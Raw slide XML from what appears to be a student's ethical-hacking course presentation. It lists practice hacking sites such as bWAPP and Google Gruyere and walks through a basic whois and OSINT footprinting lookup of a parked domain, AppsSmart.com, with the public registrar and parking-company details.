            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2950"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>&gt;    bWAPP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2950"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>&gt;    Google Gruyere</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2950"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>&gt;    Hellbound Hackers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6148" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0C31BAE-9D83-AB27-C188-F86E05CC6312}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="904875" y="8382000"/>
            <a:ext cx="1704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1400" b="1"/>
              <a:t>&gt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>OWASP Multilidae 11</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4"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D2D2A004-6C5D-F319-4FDD-C35A3DE04BE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="904875" y="944563"/>
            <a:ext cx="9175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a:t>&gt;   HackThis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" b="1"/>
              <a:t>!!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7171" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3117AA93-57E4-7D9C-BF17-B8D0A495DD08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="901700" y="1322388"/>
            <a:ext cx="5267325" cy="754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675"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>&gt;   HackTheSite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="1888"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" b="1"/>
              <a:t>DAY -2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="1675"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" b="1"/>
              <a:t>Foot printing and reconnaissance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Step-1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Search for domain name I took</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://marketplace.appsmart.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Step-2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Osint frame work </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Step-3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Domain name - who is records - Domain tools whois </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Step-4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Paste the domain name </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Step-5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>I got results of this site </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Step-6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Registrant Domain Admin / This Domain is For Sale Registrant Org HugeDomains.com</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4"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0CED3EE-FF02-6199-0BA4-168440760BE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="901700" y="957263"/>
            <a:ext cx="58896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Registrant Country US</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8195" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1024B5E2-0477-6705-851E-C1B5C1615902}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="901700" y="1387475"/>
            <a:ext cx="5889625" cy="74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Registrar TurnCommerce, Inc. DBA NameBright.com IANA ID: 1441</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.NameBright.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t> Whois Server: whois.NameBright.com(p)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Registrar Status clientTransferProhibited</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Dates 4,250 days old</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Created on 2011-11-21</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Expires on 2025-11-21</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Updated on 2020-11-15</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Name Servers NSG1.NAMEBRIGHTDNS.COM (has 4,700,935 domains) NSG2.NAMEBRIGHTDNS.COM (has 4,700,935 domains)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Tech Contact Domain Admin / This Domain is For Sale HugeDomains.com 2635 Walnut Street,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Denver, CO, 80205, US</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="1263"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>(p)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="1263"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>IP Address 52.71.57.184 - 813,907 other sites hosted on this server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>IP Location United States - Virginia - Ashburn - Amazon Technologies Inc.</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4"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81F31B63-94F3-1BD7-17C2-EFA863927ED1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="895350" y="947738"/>
            <a:ext cx="5703888" cy="779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2250"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="425"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>ASN United States AS14618 AMAZON-AES, US (registered Nov 04, 2005)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Domain Status Registered And No Website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>IP History 227 changes on 227 unique IP addresses over 14 years</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Registrar History 4 registrars with 2 drops</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Hosting History 10 changes on 6 unique name servers over 14 years Whois Record ( last updated on 2023-07-12 )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Domain Name: AppsSmart.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Registry Domain ID: 1688302902_DOMAIN_COM-VRSN Registrar WHOIS server: whois.NameBright.com Registrar URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.NameBright.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t> Updated Date: 2020-11-15T00:00:00.000Z Creation Date: 2011-11-21T19:21:43.000Z</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Registrar Registration Expiration Date: 2025-11-21T00:00:00.000Z</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Registrar: TurnCommerce, Inc. DBA NameBright.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Registrar IANA ID: 1441</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Registrar Abuse Contact Email:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Registrar Abuse Contact Phone: +1.7204960020</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Domain Status: clientTransferProhibited </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.icann.org/epp#clientTransferProhibited</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5"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8AB5F16A-C9EF-6E48-C4AC-338829A5C3B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="895350" y="954088"/>
            <a:ext cx="4929188"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Registry Registrant ID: Not Available From Registry</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10243" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B869DFE2-5821-4FE0-2073-DB01948EA427}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="895350" y="1374775"/>
            <a:ext cx="4929188" cy="720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Registrant Name: Domain Admin / This Domain is For Sale</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Registrant Organization: HugeDomains.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Registrant Street: 2635 Walnut Street</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Registrant City: Denver</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Registrant State/Province: CO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Registrant Postal Code: 80205</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Registrant Country: US</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Registrant Phone: +1.3038930552</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Registrant Phone Ext:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Registrant Fax:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Registrant Fax Ext:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Registrant Email:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Registry Admin ID: Not Available From Registry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Admin Name: Domain Admin / This Domain is For Sale</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Admin Organization: HugeDomains.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Admin Street: 2635 Walnut Street</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Admin City: Denver</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Admin State/Province: CO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10244" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A26AA62-5B98-09A6-3045-CCE8C0D8B0FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="895350" y="8750300"/>
            <a:ext cx="23653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a:t>Admin Postal Code: 80205</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10245" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43B13557-3E8E-D016-EA6A-3F36509E2EE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="8991600"/>
            <a:ext cx="670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t>Name Server: nsg2.namebrightdns.com</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1634949B-CF0E-7214-98E6-1A4D2864A1D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="895350" y="954088"/>
            <a:ext cx="4459288" cy="804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Admin Country: US Admin Phone: +1.3038930552 Admin Phone Ext:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Admin Fax:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Admin Fax Ext:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Admin Email:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Registry Tech ID: Not Available From Registry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Tech Name: Domain Admin / This Domain is For Sale</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Tech Organization: HugeDomains.com</a:t>
            </a:r>
          </a:p>
          <a:p>
